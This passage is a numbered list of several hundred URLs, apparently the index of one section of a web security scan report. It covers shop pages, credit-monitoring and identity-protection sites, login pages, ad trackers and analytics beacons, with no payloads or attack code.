18.73. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pagesshared/Include/tracking_agency.js

18.74. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/ScriptResource.axd

18.75. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery-1.4.2.min.js

18.76. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery-ui-1.8.4.custom.min.js

18.77. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.ba-postmessage.min.js

18.78. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.base64.js

18.79. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.cookie.js

18.80. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.nyroModal-1.6.2.js

18.81. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/jquery.plugin.1.0.3.js

18.82. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Scripts/search.popup.js

18.83. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/WebResource.axd

18.84. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/Produkteverzeichnis/01_Festnetz/Aton_cl112/aton_clt112/small.gif

18.85. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/cards/taxcard/taxcard20_23655_small.gif

18.86. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/directories/directories_76465_small.gif

18.87. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/fax/multiphone/top_mx94/top_mx94_119978_small.gif

18.88. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/festnetz_abos/plauderabo/plauderabo_120092_small.gif

18.89. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/foto_2008/fax/fx310/125092_small.gif

18.90. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/foto_2008/telefone/aton_c28/aton_c28_small.gif

18.91. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/foto_2008/telefone/aton_cl311/129893_small.gif

18.92. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/foto_2008/telefone/aton_cl411/small.gif

18.93. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/foto_2008/telefone/aton_clt615_isdn/small.gif

18.94. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/foto_2008/telefone/gigaset_c590/c590_small.gif

18.95. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/telefone/spezial_apparate/wad_a25/wad_a25_83419_small.gif

18.96. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/products/telefone/zubehoer/div/repeater_107904_small.gif

18.97. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/promo_teaser/os_festnetz/promo.jpg

18.98. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/promo_teaser/promotional/Siemens_Gigaset_SL400_EN.jpg

18.99. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/promo_teaser/teaser/185x250px_O-Shop_DataDay_en.jpg

18.100. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/promo_teaser/teaser/broschuere_zuhauseverbunden_en.jpg

18.101. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/content/promo_teaser/teaser/dsl_neuanschluesse_en.jpg

18.102. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/site/icons/space.gif

18.103. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/watermark.gif

18.104. http://t1.trackalyzer.com/trackalyze.asp

18.105. http://t2.trackalyzer.com/trackalyze.asp

18.106. http://t4.trackalyzer.com/trackalyze.asp

18.107. http://www.actividentity.com/inc/securimage/securimage_show.phpx

18.108. http://www.credit.com/r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order

18.109. http://www.creditchecktotal.com/default.aspx

18.110. http://www.creditreport.com/dni/default.aspx

18.111. http://www.dictof.com/

18.112. http://www.echomail.com/pricing/pricing_sm.asp

18.113. https://www.econsumer.equifax.com/otc/landing.ehtml

18.114. https://www.econsumer.equifax.com/otc/personalInfo.ehtml

18.115. https://www.econsumer.equifax.com/otc/sitepage.ehtml

18.116. https://www.equifax.com/cs/SessionPingHandler

18.117. http://www.experiandirect.com/

18.118. http://www.experiandirect.com/triplealert/default.aspx

18.119. https://www.experiandirect.com/triplealert/default.aspx

18.120. http://www.fightidentitytheft.com/credit-monitoring.html

18.121. http://www.freecreditreport.com/about-us/javascripts/s_code.axd

18.122. http://www.freecreditreport.com/default.aspx

18.123. http://www.freecreditreport.com/javascripts/javascripts/s_code.axd

18.124. http://www.freecreditreport.com/javascripts/s_code.axd

18.125. http://www.freecreditreport.com/privacy-policy/javascripts/s_code.axd

18.126. http://www.freecreditreport.com/terms-and-conditions/javascripts/s_code.axd

18.127. http://www.freecreditscore.com/dni/default.aspx

18.128. http://www.freecreditscore.com/dni/javascripts/s_code.axd

18.129. http://www.hotelclub.com/

18.130. http://www.identityguard.com/ipages/le4/styles/ie.css

18.131. http://www.identitymonitor.citi.com/

18.132. http://www.infusionsoft.com/

18.133. http://www.lunlizy.net/

18.134. http://www.msdn.com/

18.135. http://www.myfico.com/

18.136. http://www.nextadvisor.com/credit_report_monitoring/compare.php

18.137. http://www.nextadvisor.com/favicon.ico

18.138. http://www.nextadvisor.com/link.php

18.139. http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp

18.140. http://www.pcworld.com/articleComment/get.do

18.141. http://www.pcworld.com/articleVote/get.do

18.142. http://www.reputationengineer.com/internet-reputation-management/

18.143. http://www.securepaynet.net/gdshop/account/exec.asp

18.144. http://www.securepaynet.net/gdshop/helpcenter.asp

18.145. http://www.securepaynet.net/gdshop/icann/domain_search.asp

18.146. http://www.securepaynet.net/gdshop/myportal/consolidate.asp

18.147. http://www.securepaynet.net/gdshop/myportal/domainren.asp

18.148. http://www.securepaynet.net/gdshop/myportal/hostingren.asp

18.149. http://www.securepaynet.net/gdshop/myportal/itemren.asp

18.150. http://www.securepaynet.net/gdshop/site_log_out.asp

18.151. http://www.securepaynet.net/gdshop/support.asp

18.152. https://www.securepaynet.net/gdshop/basket.asp

18.153. http://www.swisscom.ch/res/hilfe/kontakt/index.htm

18.154. http://www.truecredit.com/

18.155. https://www.truecredit.com/

18.156. https://www.truecredit.com/products/optimizedOrder.jsp

18.157. https://www.truecredit.com/products/optimizedOrderProcess

18.158. https://www.truecredit.com/products/order2.jsp

18.159. https://www.truecredit.com/user/returnUser.jsp

18.160. https://www.truecredit.com/user/returnUserProcess

18.161. http://www.upsellit.com/custom/trustedID.jsp

18.162. http://2byto.com/bluepixel/cnt-gif1x1.php

18.163. http://2byto.com/bluepixel/cnt-gif1x1.php

18.164. http://a.tribalfusion.com/i.cid

18.165. http://ace-tag.advertising.com/action/type=970862986/bins=1/rich=0/mnum=1516/site=695501/logs=0/betr=crcom967lp_cs=2

18.166. http://action.mathtag.com/mm//TRAN//red

18.167. http://ad.amgdgt.com/ads/

18.168. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct

18.169. http://ad.doubleclick.net/activity

18.170. http://ad.doubleclick.net/adj/N3382.dogtimemedia.comOX6462/B5304363.9

18.171. http://ad.doubleclick.net/adj/N5831.132349.1555557534521/B4835684.28

18.172. http://ad.doubleclick.net/adj/inet.hostcat/_default

18.173. http://ad.doubleclick.net/clk

18.174. http://ad.trafficmp.com/a/bpix

18.175. http://ad.turn.com/server/ads.js

18.176. http://ad.yieldmanager.com/pixel

18.177. http://ad.yieldmanager.com/pixel

18.178. http://adfarm1.adition.com/track

18.179. http://ads.asp.net/a.aspx

18.180. http://ads.neudesicmediagroup.com/ads/1_300x250_TFS_greyblu_vault_SM.gif

18.181. http://ads.neudesicmediagroup.com/ads/2_300x250_TFS_VS2010book_SM.gif

18.182. http://ads.neudesicmediagroup.com/ads/728-NMG-Blue.gif

18.183. http://ads.neudesicmediagroup.com/ads/DV-300x250.png

18.184. http://ads.pointroll.com/PortalServe/

18.185. http://ads.revsci.net/adserver/ako

18.186. http://ads.revsci.net/adserver/ako

18.187. http://ads.revsci.net/adserver/ako

18.188. http://ads.revsci.net/adserver/ako

18.189. http://ads.revsci.net/adserver/ako

18.190. http://ads.revsci.net/adserver/ako

18.191. http://ads.revsci.net/adserver/ako

18.192. http://ads.revsci.net/adserver/ako

18.193. http://ads.revsci.net/adserver/ako

18.194. http://ads.revsci.net/adserver/ako

18.195. http://ads.revsci.net/adserver/ako

18.196. http://ads.revsci.net/adserver/ako

18.197. http://ads.revsci.net/adserver/ako

18.198. http://ads.revsci.net/adserver/ako

18.199. http://ads.revsci.net/adserver/ako

18.200. http://adserver.veruta.com/track.fcgi

18.201. http://adsfac.us/ag.asp

18.202. http://affiliate.idgtracker.com/rd/r.php

18.203. http://affiliate.idgtracker.com/rd/r.php

18.204. http://affiliate.idgtracker.com/rd/r.php

18.205. http://altfarm.mediaplex.com/ad/fm/14302-119028-29115-1

18.206. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197

18.207. http://ar.voicefive.com/b/wc_beacon.pli

18.208. http://ar.voicefive.com/bmx3/broker.pli

18.209. http://ar.voicefive.com/bmx3/broker.pli

18.210. http://ar.voicefive.com/bmx3/broker.pli

18.211. http://ar.voicefive.com/bmx3/broker.pli

18.212. http://ar.voicefive.com/bmx3/broker.pli

18.213. http://asset.userfly.com/users/49267/userfly.js

18.214. http://at.amgdgt.com/ads/

18.215. http://b.scorecardresearch.com/b

18.216. http://b.scorecardresearch.com/p

18.217. http://b.scorecardresearch.com/r

18.218. http://b.voicefive.com/b

18.219. http://bh.contextweb.com/bh/rtset

18.220. http://bh.contextweb.com/bh/set.aspx

18.221. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs

18.222. http://bs.serving-sys.com/BurstingPipe/adServer.bs

18.223. http://bs.serving-sys.com/BurstingPipe/adServer.bs

18.224. http://bstats.adbrite.com/click/bstats.gif

18.225. http://bstats.adbrite.com/click/bstats.gif

18.226. http://cdn.w55c.net/i/0R99JaasWk_1847829791.html

18.227. http://cdn.w55c.net/i/0R9ulNflD0_1008589149.html

18.228. http://cdn.w55c.net/i/0RDMd2Pp56_1855871382.html

18.229. http://cdn.w55c.net/i/0RES95J3Zo_918427505.html

18.230. http://cdn.w55c.net/i/0REyoPRMSz_696710848.html

18.231. http://cdn.w55c.net/i/0RFFcWpaTN_954073853.html

18.232. http://cdn.w55c.net/i/0RHDjk2rJk_401783982.html

18.233. http://cdn.w55c.net/i/0RNYnkg2EM_1392081529.html

18.234. http://cdn.w55c.net/i/0ROvzxEJNe_571009919.html

18.235. http://cdn.w55c.net/i/0RW21p2fqU_270915107.html

18.236. http://cdn.w55c.net/i/0RZieDDeGI_308736425.html

18.237. http://cdn.w55c.net/i/0RaZHwYk2m_562981296.html

18.238. http://cdn.w55c.net/i/0RilLTaqf1_958911823.html

18.239. http://cdn.w55c.net/i/0RkPQrQRFy_1341446950.html

18.240. http://cdn.w55c.net/i/0Rl7Vm3VTU_682412618.html

18.241. http://cdn.w55c.net/i/0RphY9og2j_721933665.html

18.242. http://cdn.w55c.net/i/0RuFuATqDZ_452086828.html

18.243. http://cf.addthis.com/red/p.json

18.244. http://chat.echomail.com/livezilla/server.php

18.245. http://chat.india.interactive.com/livezilla/server.php

18.246. http://citi.bridgetrack.com/track/

18.247. http://clk.atdmt.com/go/253732016/direct

18.248. http://cmi.netseer.com/match

18.249. http://cmi.netseer.com/redirect

18.250. https://crm.infusionsoft.com/go/infs/footer_psr/web

18.251. http://cspix.media6degrees.com/orbserv/hbpix

18.252. http://ctix8.cheaptickets.com/dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif

18.253. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzAvY2F0LzMyNTc5Mjk

18.254. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDU2ODU

18.255. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUwOTQ

18.256. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUxMDM

18.257. http://d.w55c.net/afr.php

18.258. http://d.w55c.net/lg.php

18.259. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js

18.260. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js

18.261. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

18.262. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

18.263. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js

18.264. http://data.adsrvr.org/map/cookie/google

18.265. http://dogtimemedia.squarespace.com/storage/dogtimecom-default-banners/sad-shopping-120x90.jpg

18.266. http://ds.addthis.com/red/psi/sites/krypt.com/p.json

18.267. http://ehg-swisscom.hitbox.com/HG

18.268. http://ehg-swisscom.hitbox.com/HGct

18.269. http://equfx.netmng.com/

18.270. http://equifaxps.122.2o7.net/b/ss/equifaxprod,equifaxglobal/1/H.17/s01850123399873

18.271. http://equifaxps.122.2o7.net/b/ss/equifaxprod,equifaxglobal/1/H.17/s0893607710022

18.272. http://fightidentitytheft.hubspot.com/salog.js.aspx

18.273. http://fls.doubleclick.net/activityi

18.274. http://forums.silverlight.net/

18.275. http://forums.silverlight.net/default.aspx

18.276. http://forums.silverlight.net/forums/13.aspx

18.277. http://forums.silverlight.net/forums/17.aspx

18.278. http://forums.silverlight.net/forums/AddPost.aspx

18.279. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx

18.280. http://forums.silverlight.net/forums/p/226774/548773.aspx

18.281. http://forums.silverlight.net/forums/t/226774.aspx

18.282. http://forums.silverlight.net/login.aspx

18.283. http://forums.silverlight.net/members/easterr0xes.aspx

18.284. http://forums.silverlight.net/user/profile.aspx

18.285. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1027338450/

18.286. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1040833525/

18.287. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072108379/

18.288. http://hellometro.us.intellitxt.com/intellitxt/front.asp

18.289. http://idcs.interclick.com/Segment.aspx

18.290. http://image.providesupport.com/js/spiffyman/safe-standard.js

18.291. http://image2.pubmatic.com/AdServer/Pug

18.292. http://img167.imageshack.us/img167/6361/06ls4.jpg

18.293. http://img262.imageshack.us/img262/3146/17ls3.jpg

18.294. http://imp.constantcontact.com/imp/cmp.jsp

18.295. http://insight.adsrvr.org/track/conv

18.296. http://inter.viewcentral.com/events/cust/search_results.aspx

18.297. https://inter.viewcentral.com/events/cust/search_results.aspx

18.298. https://inter.viewcentral.com/events/images/border/trans_spacer.gif

18.299. https://inter.viewcentral.com/events/images/loading_0.gif

18.300. https://inter.viewcentral.com/events/images/loading_1.gif

18.301. https://inter.viewcentral.com/events/images/loading_2.gif

18.302. https://inter.viewcentral.com/events/images/loading_3.gif

18.303. https://inter.viewcentral.com/events/images/poweredby1.gif

18.304. https://inter.viewcentral.com/events/incl/BusyBox.js

18.305. https://inter.viewcentral.com/events/uploads/arcsight/ae.png

18.306. https://inter.viewcentral.com/events/uploads/arcsight/arrow_red_dn.gif

18.307. https://inter.viewcentral.com/events/uploads/arcsight/arrow_red_rt.gif

18.308. https://inter.viewcentral.com/events/uploads/arcsight/asu_css.css

18.309. https://inter.viewcentral.com/events/uploads/arcsight/asu_masthead_v02.png

18.310. https://inter.viewcentral.com/events/uploads/arcsight/bg_arstfooter.jpg

18.311. https://inter.viewcentral.com/events/uploads/arcsight/bg_arstmain.jpg

18.312. https://inter.viewcentral.com/events/uploads/arcsight/bg_container.jpg

18.313. https://inter.viewcentral.com/events/uploads/arcsight/bg_page.gif

18.314. https://inter.viewcentral.com/events/uploads/arcsight/bg_sectionhdr.png

18.315. https://inter.viewcentral.com/events/uploads/arcsight/catalog_employee.png

18.316. https://inter.viewcentral.com/events/uploads/arcsight/catalog_partner.png

18.317. https://inter.viewcentral.com/events/uploads/arcsight/cbt.jpg

18.318. https://inter.viewcentral.com/events/uploads/arcsight/cellBg.gif

18.319. https://inter.viewcentral.com/events/uploads/arcsight/cellBg2.gif

18.320. https://inter.viewcentral.com/events/uploads/arcsight/esm.png

18.321. https://inter.viewcentral.com/events/uploads/arcsight/greybar.png

18.322. https://inter.viewcentral.com/events/uploads/arcsight/icon_new.png

18.323. https://inter.viewcentral.com/events/uploads/arcsight/ilt.jpg

18.324. https://inter.viewcentral.com/events/uploads/arcsight/logger.png

18.325. https://inter.viewcentral.com/events/uploads/arcsight/red.png

18.326. https://inter.viewcentral.com/events/uploads/arcsight/topbgfill.gif

18.327. https://inter.viewcentral.com/events/uploads/arcsight/vlt.jpg

18.328. https://inter.viewcentral.com/events/uploads/arcsight/wbt.png

18.329. https://inter.viewcentral.com/favicon.ico

18.330. https://inter.viewcentral.com/reg/arcsight/home

18.331. http://kroogy.com/

18.332. http://krypt.com/

18.333. http://krypt.com/active/cart/add.html

18.334. http://krypt.com/active/cart/cart-image.html

18.335. http://krypt.com/dedicated/

18.336. http://krypt.com/go/promos

18.337. http://l.betrad.com/ct/0_0_0_0_0_1153/us/0/1/0/0/0/0/15/242/273/0/pixel.gif

18.338. http://l.betrad.com/ct/0_0_0_0_0_1153/us/0/1/0/0/0/0/16/242/273/0/pixel.gif

18.339. http://l.betrad.com/ct/0_0_0_0_0_79/us/0/1/0/0/0/0/15/242/273/0/pixel.gif

18.340. http://leadback.advertising.com/adcedge/lb

18.341. https://login.live.com/login.srf

18.342. https://login.silverlight.net/login/createuser.aspx

18.343. https://login.silverlight.net/login/signin.aspx

18.344. http://m.webtrends.com/dcs1wotjh10000w0irc493s0e_6x1g/dcs.gif

18.345. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif

18.346. http://m.webtrends.com/dcsmgru7m99k7mqmgrhudo0k8_8c6m/dcs.gif

18.347. http://maps.google.co.in/maps

18.348. http://maps.google.com/maps

18.349. http://maps.google.com/maps/vp

18.350. http://media.fastclick.net/w/tre

18.351. http://metrics.citibank.com/b/ss/prod/1/H.22.1/s0465555016417

18.352. http://msdn.microsoft.com/

18.353. http://o.swisscom.ch/b/ss/swisscom-onelive/1/H.21/s01998541245702

18.354. http://o.swisscom.ch/b/ss/swisscom-onelive/1/H.21/s02805667424352

18.355. http://o.swisscom.ch/b/ss/swisscomonlineshop/1/H.19.4/s0175835486735

18.356. http://o.swisscom.ch/b/ss/swisscompublic/1/H.16/s08473835119511

18.357. http://omni.pcworld.com/b/ss/pcwmw-pcworld/1/H.20.3/s02955502904951

18.358. https://online.americanexpress.com/myca/acctsumm/us/action

18.359. https://online.americanexpress.com/myca/logon/us/action

18.360. https://online.americanexpress.com/myca/shared/summary/UMS/images/us/generic.jpg

18.361. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s08759140628390

18.362. http://partners.nextadnetwork.com/z/111/CD76/&dp=80

18.363. http://partners.nextadnetwork.com/z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04

18.364. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471

18.365. http://partners.nextadnetwork.com/z/406/CD76

18.366. http://partners.nextadnetwork.com/z/45/CD1/cct+na_crm_free_credit_score_review--2011-04-24--13-44-27

18.367. http://partners.nextadnetwork.com/z/48/CD1/945440258

18.368. http://partners.nextadnetwork.com/z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01

18.369. http://partners.nextadnetwork.com/z/518/CD1/idf+903230053

18.370. http://pixel.33across.com/ps/

18.371. http://pixel.fetchback.com/serve/fb/pdc

18.372. http://pixel.mathtag.com/event/img

18.373. http://pixel.quantserve.com/pixel

18.374. http://pixel.quantserve.com/pixel/p-01ujhAj7lIRP-.gif

18.375. http://pixel.rubiconproject.com/tap.php

18.376. https://portal.actividentity.com/

18.377. http://positivesearches1.app6.hubspot.com/salog.js.aspx

18.378. http://r.turn.com/r/beacon

18.379. http://r.vertster.com/track/

18.380. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

18.381. http://roia.biz/im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A

18.382. http://roia.biz/im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A

18.383. http://s18.sitemeter.com/js/counter.asp

18.384. http://s41.sitemeter.com/js/counter.asp

18.385. http://sales.liveperson.net/hc/31254474/

18.386. http://sales.liveperson.net/hc/31254474/

18.387. http://sales.liveperson.net/hc/71003277/

18.388. http://sales.liveperson.net/hc/71003277/

18.389. http://sales.liveperson.net/hc/71003277/

18.390. https://secure.identityguard.com/EnrollmentStep1

18.391. https://secure.identityguard.com/EnrollmentStep1

18.392. https://secure.identityguard.com/Logoff

18.393. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

18.394. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff

18.395. https://secure.krypt.com/active/cart/cart-image.html

18.396. https://secure.krypt.com/cart/

18.397. https://secure.krypt.com/checkout/

18.398. https://secure.krypt.com/order/customize.html

18.399. https://secure.lifelock.com/

18.400. https://secure.lifelock.com/enrollment

18.401. https://secure.lifelock.com/enrollment/

18.402. https://secure.lifelock.com/portal/account-reset

18.403. https://secure.lifelock.com/resources/org.apache.wicket.ajax.AbstractDefaultAjaxBehavior/indicator.gif

18.404. https://secure.lifelock.com/resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

18.405. https://secure.lifelock.com/resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

18.406. https://secure.lifelock.com/scripts/global.js

18.407. https://secure.lifelock.com/siteopt.js

18.408. https://secure.lifelock.com/styles/login.css

18.409. https://secure.lifelock.com/styles/theme-lifelock.css

18.410. https://secure.lifelock.com/styles/webstore.css

18.411. https://security.live.com/LoginStage.aspx

18.412. http://segment-pixel.invitemedia.com/pixel

18.413. http://sftrack.searchforce.net/SFConversionTracking/redir

18.414. http://smetrics.freecreditreport.com/b/ss/expiglobal,expifcslive/1/H.22.1/s0943075860850

18.415. http://srv.amadesa.com/Interaction2/app

18.416. http://stats.adbrite.com/stats/stats.gif

18.417. http://stats.adbrite.com/stats/stats.gif

18.418. http://stats.kroogy.com/cnt-gif1x1.php

18.419. http://stats.kroogy.com/cnt-gif1x1.php

18.420. http://switch.atdmt.com/action/msnus_experian_homepage_091807

18.421. http://technet.microsoft.com/edge/

18.422. http://track3.mybloglog.com/js/jsserv.php

18.423. http://translate.googleapis.com/translate_a/t

18.424. http://transunioninteractive.122.2o7.net/b/ss/tuitruecredit/1/H.22.1/s23772791333030

18.425. http://twitter.com/statuses/user_timeline/PrivacyGuard.json

18.426. http://twitter.com/statuses/user_timeline/PrivacyGuard.json

18.427. https://vault.krypt.com/

18.428. http://windowsclient.net/default.aspx

18.429. http://windowsclient.net/omniture/analyticsid.aspx

18.430. http://windowsclient.net/themes/leanandgreen/common/home.aspx

18.431. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

18.432. http://www.apture.com/js/apture.js

18.433. http://www.arcsight.com/blog/

18.434. http://www.arcsight.com/products/products-esm/arcsight-express/

18.435. http://www.arcsight.com/products/products-identity/

18.436. http://www.arcsight.com/supportportal/

18.437. http://www.credit.com/r/fico_score_watch_enroll/af=p39800&ag=default

18.438. https://www.credit.com/r/fico_score_watch_enroll/af=p39800&ag=default

18.439. http://www.creditchecktotal.com/Message.aspx

18.440. http://www.creditchecktotal.com/javascripts/s_code.axd

18.441. https://www.creditchecktotal.com/ForgotLogin.aspx

18.442. https://www.creditchecktotal.com/Login.aspx

18.443. https://www.creditchecktotal.com/Message.aspx

18.444. https://www.creditchecktotal.com/Order1.aspx

18.445. https://www.creditchecktotal.com/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

18.446. https://www.creditchecktotal.com/javascripts/s_code.axd

18.447. http://www.creditreport.com/dni/javascripts/s_code.axd

18.448. https://www.creditreport.com/DNI/ajaxpro/ECD.Web.WebProcesses.bpAddressByZipQAS,ECD.Web.WebProcess.AccountInfo.ashx

18.449. https://www.creditreport.com/DNI/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx

18.450. https://www.creditreport.com/DNI/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

18.451. https://www.creditreport.com/dni/Order1.aspx

18.452. https://www.creditreport.com/dni/javascripts/s_code.axd

18.453. https://www.creditreport.com/dni/time-out.aspx

18.454. http://www.discountasp.net/tfs/go/go.aspx

18.455. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

18.456. http://www.etracker.de/cnt.php

18.457. http://www.experiandirect.com/triplealert/javascripts/s_code.axd

18.458. https://www.experiandirect.com/TRIPLEALERT/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

18.459. https://www.experiandirect.com/triplealert/Message.aspx

18.460. https://www.experiandirect.com/triplealert/Order1.aspx

18.461. https://www.experiandirect.com/triplealert/javascripts/s_code.axd

18.462. http://www.fischerinternational.com/competencies/identity_management.htm

18.463. http://www.freecreditreport.com/Images/tracking_pixel_unload.gif

18.464. http://www.freecreditreport.com/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx

18.465. http://www.freecreditreport.com/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx

18.466. http://www.freecreditreport.com/ajaxpro/ECD.Web.WebProcesses.bpSubmit,ECD.Web.WebProcess.SubmitAction.ashx

18.467. http://www.freecreditreport.com/ajaxpro/converter.ashx

18.468. http://www.freecreditreport.com/ajaxpro/core.ashx

18.469. http://www.freecreditreport.com/ajaxpro/prototype.ashx

18.470. http://www.freecreditreport.com/javascripts/s_code.axd

18.471. http://www.freecreditreport.com/spacer.gif

18.472. http://www.freecreditscore.com/dni/ajaxpro/ECD.Web.WebProcesses.bpRegisterCookie,ECD.Web.WebProcess.Tracking.ashx

18.473. http://www.freecreditscore.com/dni/javascripts/s_code.axd

18.474. https://www.freecreditscore.com/dni/javascripts/s_code.axd

18.475. https://www.freecreditscore.com/dni/sign-in.aspx

18.476. http://www.googleadservices.com/pagead/aclk

18.477. http://www.googleadservices.com/pagead/conversion/1023174153/

18.478. http://www.googleadservices.com/pagead/conversion/1072108379/

18.479. http://www.hellonetwork.com/ypsearch.cfm

18.480. http://www.identityguard.com/

18.481. http://www.identityguard.com/gscc.aspx

18.482. http://www.infusionblog.com/

18.483. http://www.infusionsoft.com/

